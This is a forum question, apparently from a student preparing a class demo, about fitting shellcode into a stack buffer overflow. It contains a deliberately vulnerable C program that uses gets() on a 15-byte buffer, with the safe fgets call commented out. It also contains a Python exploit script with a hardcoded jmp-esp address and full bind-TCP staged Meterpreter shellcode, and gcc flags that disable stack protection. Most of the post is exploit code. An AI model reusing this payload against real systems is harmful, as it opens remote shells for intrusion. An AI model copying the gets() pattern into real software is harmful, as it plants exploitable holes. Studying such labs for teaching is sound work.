# Limited ESP Length in Buffer Overflow Sample C Program

Tags: metasploit, buffer-overflow, c, reverse-engineering

May I know how to increase the length of ESP on a sample c program which allows me to execute shellcode on the stack. However, as of now, the sample c program only has an ESP length of 61 thus insufficient for the shellcode. Any help is appreciated! This is for a class demonstration for beginners, i'm also a student so i'm very new to buffer overflow.

**Sample C Program**

```
#include <stdio.h>
#include <string.h>

#pragma warning(disable: 4996)

int root(void)
{

    printf("\n Root privileges given to the user \n");
    return 0;
}

int user(void){

    printf("\n Normal user privileges given to the user \n");
    return 0;
}


int main(void)
{
    char buff[15];
    int pass = 0;
    int max = 15;


    printf("\n Enter the password : \n");
    //fgets(buff, max, stdin);
    gets(buff);

    if (strcmp(buff, "thegeekstuff"))
    {
        printf("\n Wrong Password \n");
    }
    else
    {
        printf("\n Correct Password \n");
        pass = 1;
    }

    if (pass == 1)
    {
        root();
    } else {
        user();
    }

    return 0;
}
```

Python Code for Exploit (Win86) - bind_tcp_staged_meterpreter [LPORT=4444]

*Note: added an instruction for (add esp, -1500) before bind shell payload

```
#! python

import os
import sys
import subprocess
import binascii
import time

ESP_Address = bytes.fromhex('5954C377')

buf =  ""
# Add ESP, -1500
buf += "\x81\xC4\x24\xFA\xFF\xFF"
# Bind Meterpreter Shell
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a\x02\x68"
buf += "\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89"
buf += "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57"
buf += "\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1"
buf += "\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x6a\x00"
buf += "\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36"
buf += "\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4"
buf += "\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"


bind_staged_shell_payload = bytes(buf, "utf-8")
Dummy_Data = ("A" * 35).encode()

final_payload = Dummy_Data + ESP_Address + bind_staged_shell_payload

p = subprocess.Popen('buffer_overflow.exe', stdin=subprocess.PIPE) #NOTE: no shell=True here
time.sleep(20)
p.stdin.write(final_payload)
p.communicate()[0]
p.stdin.close()

sys.exit(0)
```

Code used to compile c program in windows XP SP 1

```
gcc -Wl,--stack,4194304 -fno-stack-protector -m32 buffer_overflow.c -o buffer_overflow.exe
```

What I've tried....very embarrassing with no success:

1. Compile C Program with the  `-Wl,--stack,4194304` option
2. Tried to increase stack size by creating dummy variables with huge buffers (Apparently, it makes the length of ESP shorter...)
3. Running cmd as Administrator...
4. Turning off Firewall
5. Testing Connectivity with nc IP_ADDRESS 4444 but connection refused (bind shell not generated successfully from exploit code) - will use meterpreter handler once connectivity has successfully established for the staged payload

**Notes**

The program does not crash with the shellcode as input...However, if a string with 100 characters is inserted, the program crashes.